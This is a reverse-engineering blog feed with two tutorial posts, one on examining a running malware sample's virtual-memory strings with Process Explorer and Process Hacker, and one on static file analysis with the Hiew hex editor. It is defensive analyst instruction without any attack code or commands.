tag:blogger.com,1999:blog-92059391884283109562024-03-15T01:30:00.601-07:00dream of a reverse engineerA blog dedicated to Reverse engineering, malware analysis ,exploitsabhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.comBlogger13125tag:blogger.com,1999:blog-9205939188428310956.post-81257627452117177782019-09-02T06:39:00.000-07:002019-09-02T06:39:29.579-07:00Virtual Memory Analysis: The overlooked part of Dynamic Analysis<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
When we talk about dynamic analysis of malware in windows environment,we see file modification ,Registry modification, Network communication ,Process creation but I feel people overlook the virtual memory of a process .Well most experienced researchers might be using it but an amateur researcher might miss as there is rare mention of it in any,blogs or tutorials. Please do not confuse this with <b>memory forensics</b> .<br />
<br />
Before getting into details , I would recommend readers to have some basic idea on virtual memory of windows. I have explained some of windows internal concept including <a href="https://www.oreilly.com/library/view/preventing-ransomware/9781788620604/514934f9-9160-4f4c-a85e-a8f2663aeb26.xhtml">virtual memory</a> in chapter 2 of my book <a href="https://www.oreilly.com/library/view/preventing-ransomware/9781788620604/">Preventing Ransomware</a> .<br />
<br />
To analyse Virtual Memory you can use<br />
1)<a href="https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer">Process Explorer</a> from sysinternals<br />
2)<a href="https://processhacker.sourceforge.io/">Process Hacker</a><br />
<br />
While <b>Process Explorer</b> limits itself to displaying memory <b>strings of a specific area (only the main module or main function )</b>of memory only but <b>process hacker</b> can show much more details like <b>memory blocks</b>,<b>permission</b> of <b>memory blocks</b>, <a href="https://docs.microsoft.com/en-us/windows/win32/memory/page-state"><b>page states</b></a>, <b>modules </b>etc . Also process Hacker shows strings of the entire user space virtual memory unlike process explorer<br />
<br />
To inspect memory strings process explorer,double click a process and go to strings tab and click on "memory" radio button .<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 556px; overflow: hidden; width: 462px;"><img height="556" src="https://lh3.googleusercontent.com/xMtW9q_upE--RP3J_R_UK5yZ_9eS78GvUOv1fG62fwBucYks8xEkqH58ADhvoREIT7X8y12_S-ZkmweG1nJOpGsdeF0-XvSo3s2MowLQCfyM5XTGd9C9QryKCJ4q0NhFojNWOpSD" style="margin-left: 0px; margin-top: 0px;" width="462" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-70ebf8b1-7fff-befc-f427-09553ba1f95d"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
As I said process explorer limits itself to the strings. From strings you can derive a lot of stuff. We will see that in sometime<br />
<br />
To view memory with process hacker you can double click a process and go to memory tab.<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 368px; overflow: hidden; width: 591px;"><img height="368" src="https://lh4.googleusercontent.com/gK8GulrFNHT3uCA2egAdloN4DHErbpZeZCOA6h327CIUYd1bpJRO_4XSt61h9nWVGi22LrQ6pG2hCQAa9gEKvhGdi5Lwas1HIj-CjhBIay039DAU_SuhGC6qJ8NUhTZHuEyZevYs" style="margin-left: 0px; margin-top: 0px;" width="591" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-9c5caf1c-7fff-7751-8a6d-fa0f79fd7231"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">The image displayed has a page whose state is commit and permission is RW(read write). Don't think that these properties are of no use. These can be used to find out </span><b style="font-size: 14.6667px; white-space: pre-wrap;">injected code</b><span style="font-size: 14.6667px; white-space: pre-wrap;">, </span><b style="font-size: 14.6667px; white-space: pre-wrap;">memory allocated by API's like VirtualAlloc</b><span style="font-size: 14.6667px; white-space: pre-wrap;"> etc. </span><span style="font-size: 14.6667px; white-space: pre-wrap;">In this article I will stress more what we can derive from strings available in memory.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">you can view<b> strings </b>in process hacker by clicking on <b>strings</b> button shown in the above image</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 352px; overflow: hidden; width: 624px;"><img height="352" src="https://lh3.googleusercontent.com/HTCkh-_58gaPHKMTT23azpOpeJSCuNnJcPDom93EZq2zeQamZlxmiXXauPEHBAP8X2lNNmUF-Vl3we3AnLP1YjCwZuCD1WhuBApc7aao32CdwSRtLlktvv2cTEm_CHaOMxgk-I_O" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-82453465-7fff-4616-ab76-7715410e0a7a"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Well you can see lot more strings in <b>process hacker</b> compared to <b>process explorer</b> ,even the address of the strings. You can use this data while reverse engineering too. </span></span><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">If you are </span><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">analyzing</span><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"> strings using process hacker you also need to find out which areas of memory you should omit and what to look into and some more filtering ,otherwise you will get millions of strings to analyse. </span><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">Well I am keeping the string filtering stuff restricted to my training .</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Here are some stuff you can derive by looking into the strings in memory</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">1)</span></span><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">Was the file malware file packed or not?</span></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">you can compare strings in file and virtual memory. If you get useful strings in memory and not in file then ,the malware file is packed and unpacks in memory. Well you need a bit of practice to find out if the strings are important or not. I have mentioned some important strings in the following points but there are lot more. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><b>2)malware was armored or not?</b></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Often malwares do not execute completely if they detect virtual machines or security tool or due to any other reasons but still you can see relevant data</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">example:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 354px; overflow: hidden; width: 570px;"><img height="354" src="https://lh5.googleusercontent.com/nxvUTJlOzBCkV6eu6n3sB2RBAnmHefVVcoP3SzJf_XLQlz2csBXwMDTEpaURalY0WRfcbDLcdji4L2ZXTW_PvrBr1FigoPTHqjSakTwFidALVqrneICyS3c5P62MttgnwVewMiOS" style="margin-left: 0px; margin-top: 0px;" width="570" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-3c6966d6-7fff-88ac-3d8f-b93fff26dbc3"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
This is screenshot strings of a malware memory which did not execute completely as it seems like it is looking for presence of virtual machines but at the same time I found other string like run entry and URL patterns which helped me to conclude that it is a malware even though <b>nothing conclusive</b> was visible in <b>dynamic analysis </b>other than a process being created.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b>3)Command and control patterns.URL's etc.</b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 36px; overflow: hidden; width: 624px;"><img height="36" src="https://lh4.googleusercontent.com/PYJ8Wrk2sZ0OjZht0JYnwqeo6dVwuM9-jEy_b8mrk0i4prnorKBqYW8BJK2X7oIW5mx-9fd04GfCFQ4fkX9stQu8Iyd8iGbQecTSktIOI86PslfBpy0gDAsb9P4dWlS6Olfaje9M" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-bea13f3a-7fff-0677-49bb-2a9dc8ef3a15"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Even though the malware did not execute for me I could see the following pattern. This pattern is likely to be used by malware to send victim's system information to the hacker's server </div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><b>4)Malware Classification,naming </b></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Sometimes you can see see string like names of malwares, author names . you can google for certain patterns and find that similar malware has been analysed in some blogs or sandbox.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Here is one of my blogs on <a href="https://forums.juniper.net/t5/Threat-Research/Kronos-The-Banking-Chronicle/ba-p/358143">Kronos Ransomware</a> . If you see strings like "<b>data_before,data_after,data_inject,data_end</b>", it's more likely to be a banking malware.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">Well it's important to mention that a lot of times you might not get an opportunity to view strings as the malware process might terminate quickly or memory pages may be overwritten but there is always workaround for such problems . you can try my</span><a href="https://github.com/amohanta/process_stopper/blob/master/process_stopper.sys" style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"> process stopper</a><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"> tool even though it's not perfect. Other techniques can include efficiently using debuggers.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Well you can do lot more by analyzing the memory. Well I stress a lot on memory analysis in my training </span></span><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"> "</span><a href="http://www.rednetcybersecurity.com/elementor-2455/" style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">Malware Analysis made Easy Training</a><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">"(The site is still under construction) . Sometimes the techniques can eliminate the need to go through complex reverse engineering process. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<br />
<br /></div>
abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com4tag:blogger.com,1999:blog-9205939188428310956.post-6954216337980195102019-08-07T01:38:00.003-07:002019-08-07T01:38:42.704-07:00Static Analysis with Hiew<div dir="ltr" style="text-align: left;" trbidi="on">
In my previous <a href="https://dreamofareverseengineer.blogspot.com/2019/07/using-far-manager-and-hiew-duo-in.html">post</a>, I talked about using far manager in speeding up malware analysis work. I also talked about integrating hiew(Hacker's view) into far manager.<br />
With arrival of new tools like IDA pro , Hiew is being forgotten . But it's still worth to look into the tool. It is a lightweight tool with <b>Hex Editor</b>,<b>PE(Portable Executable) parser</b>, <b>x86 Disassembler</b>,<b>string viewer</b> and some other notable features which can help antivirus researcher's to do some quick static analysis on a suspect file . I have been using it for years for writing AV signatures.<br />
<br />
If you open a file in hiew ,it tries shows content of the file in <b>text mode</b> of hiew. This mode is It is same as opening a file in notepad.<br />
<div dir="ltr" id="docs-internal-guid-13bb06f4-7fff-178b-3d8b-a775e534305a" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 314px; overflow: hidden; width: 621px;"><img height="314" src="https://lh3.googleusercontent.com/hh6ASe3iOVWEEUtZAhmlTUkxuncMi9JrMH9zu3sjAHq5srMila97Dl2F6srI9-ewY60wYIFbxKd597YSUmbr8My6OuvP8Tv9lVsgql8DOTbXAeXbtVPWDOSkpzjoLFdT_Vq54Y6j" style="margin-left: 0px; margin-top: 0px;" width="621" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">To know what all you can do with hiew see the pane a the bottom.</span></span></div>
<div dir="ltr" id="docs-internal-guid-0d5c993f-7fff-c929-46fb-180da7c70b0c" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 299px; overflow: hidden; width: 624px;"><img height="299" src="https://lh5.googleusercontent.com/KiecjJLP6_xIqBzlJedckuKt-jtsDkUS4Rhsf_OhJzX6G0_yrVZE4q26r8Qe-8lLjuAAey4hq4A6SVVtd5ytCfSuvR9Llpq5iQYQecvWEE7b_Xzvwxop6s19X1SoGNHqnIgLW2rk" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">F1 is for help</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">F5 can be used to go to particular offset in file</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">F7 for searching a string.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">To change mode you can use F4.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"> </span></span><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">Hiew has two other modes other than text , that is Hex and Decode. you can switch modes by pressing</span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"> F4</b><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"> and then select the mode using </span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">arrow keys</b><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"> and press </span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">enter</b><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">.</span></div>
<div dir="ltr" id="docs-internal-guid-596700c9-7fff-2dd4-85d5-daa0dcef224c" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 275px; overflow: hidden; width: 423px;"><img height="275" src="https://lh4.googleusercontent.com/E_rHpFt1JVpuufK8qMV9ceTWh9j4YHikDl79UJ7ktxQW4p4DpygWSyDehO81a5lmbo3FDWL2T4y3MHSSta1bNym0kytPg_LMpQ6MalKAm5KkSq2j35Ix9H2PXqxcTvDBciWx051V" style="margin-left: 0px; margin-top: 0px;" width="423" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">Hiew has a hex editor embedded in it. If you want to see the equivalent hex bytes you need change the </span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">mode to hex</b><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"> . you can do it by pressing the keys F4, then use arrow key to go to hex and then press enter. The third mode is decode which can disassemble a line .</span><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">Also you can press </span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">enter</b><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"> to switch between modes.</span></div>
<div>
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 184px; overflow: hidden; width: 624px;"><img height="184" src="https://lh3.googleusercontent.com/OMXrvHwExQhOSeBiVFx9UC2KVbuGZfoDwejVQ_wCOmU09mKc6SdWVLEx-FoKmf8xB-usimky8pgCzU8qeeXFP-4pEsGurlw3xedN3FcoYliWbf9GJP1pShL7zy_mqojcqrUMa-HD" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">The first column is <b>file offset</b>(in case of PE files this shows as <b>Virtual address</b> by default . you need to press <b>ALT+F1 </b>to see <b>file offsets</b>). Middle column is hex bytes. Third is text. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">To see strings in a file in any mode you can press <b>Alt+ F6</b>. This eliminates the need to use another string viewer tool like <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/strings">strings</a> from sysinternal.</span></span></div>
<div dir="ltr" id="docs-internal-guid-2386f115-7fff-fefd-f7f7-3cc28b4f3998" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 361px; overflow: hidden; width: 512px;"><img height="361" src="https://lh6.googleusercontent.com/SojG3VwxNgYeIsOr5U_rn2ZW8oCni7dG-M6yWgI7xOerMsFPy8Cxet6cN7HCA77xAcGT-8ggy4opDL0vnzNeCYu95uiCyncueFJceZm6DTOS1Tx-2NavC3z4AcFsnZj_0X1enfvn" style="margin-left: 0px; margin-top: 0px;" width="512" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">The blue strings are <b>ascii</b> while red are <b>unicode.</b> To see the offset of the string in the file you can move the cursor to the string and press enter .</span></span></div>
<div dir="ltr" id="docs-internal-guid-8a1ad6e7-7fff-786b-edaa-cf24804c71e8" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 232px; overflow: hidden; width: 624px;"><img height="232" src="https://lh6.googleusercontent.com/-WHvOTNKQ4yZVMpjo4FAJUftEuTSg-2Kz7m9puOfL1dhNINbS75PXIhMtYRzW5KrV-3fesM_66yXnEInDxi1deorUiTQrh6IDtHiapgq3F4BwCVCVbLMSPtBLiix80Rm3MBv2mWq" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
You can see at offset "0x00334DF0" ,"October " string is there .</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Let's look into the PE parser of hiew. Open windows executable(32 bit) in hex mode. By default Virtual address is shown instead of file offsets.</div>
<div dir="ltr" id="docs-internal-guid-9998e681-7fff-bf01-b0cc-58248045a150" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 267px; overflow: hidden; width: 624px;"><img height="267" src="https://lh6.googleusercontent.com/geyfrUhJS9QmN6TUywtWP7WJeEAjKhw9SMqYQguDLKjH9qKd739KJdUJJivZgCbXBD_ivHo6YgAjGuY3qUKBazwVCci0MXJ13yWpT2-6h8mlCcaVUZSHVWePXFHJWVtX1CqOxm1w" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">If you want to see offsets you can press "<b>Alt+F1</b>". </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Also notice what comes at the bar at bottom of hiew.</span></span></div>
<div dir="ltr" id="docs-internal-guid-5aa911d9-7fff-0abc-194a-f47c570514ac" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 204px; overflow: hidden; width: 624px;"><img height="204" src="https://lh5.googleusercontent.com/FX5eg2-XqZYA1PLeYnbPid8ZrpJTKIRVzB00u6R9HNMs-jsSuaakoJ0v6bNKZKGYbmaHpbOqzK49fQW5bUXuoHhduXfb5Clmfc2bNHCBodatv0x6f2Oczt49kO3jLEzxOVoiqId-" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b>F4</b>-changing mode</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b>F5</b>- to go to an address. If you want to go a offset press F5 then type the address . If it is virtual address start with a "." and the type the virtual adress.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b>F6</b> stands for Reference . This is like XRefs feature of IDA pro of "find reference " of ollydbg. It tells where a particular data or piece of code is referenced .</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b>F8</b> for viewing the PE header .</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Let me press F8 and see what happens.</div>
<div dir="ltr" id="docs-internal-guid-12430550-7fff-4c1a-9ada-2125cd27e869" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 356px; overflow: hidden; width: 624px;"><img height="356" src="https://lh3.googleusercontent.com/8n7MZyIZJj7JeWeqOp9PDv9_0NF8aLUzHQ3QNUJ1m42X7SuS3F5OJHg132-7dphqrklV8rdIUVAYgWKCzX4lkObjGy-0fjWPXFww8WHgfVdD9DCisyAMSPjsfrEcPTy83_iRmB4O" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">The PE header pops up and the options at bottom of screen also changes. If you press F4 it goes to PE Header in disassemble. </span></span></div>
